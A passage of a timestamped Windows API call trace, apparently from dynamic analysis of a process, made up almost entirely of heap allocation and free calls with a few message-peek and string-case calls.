hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.913] CloseHandle (hObject=0x158) returned 1 [0189.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0189.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.920] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.920] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.921] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.922] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.922] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.922] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0189.923] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0189.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.927] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.930] 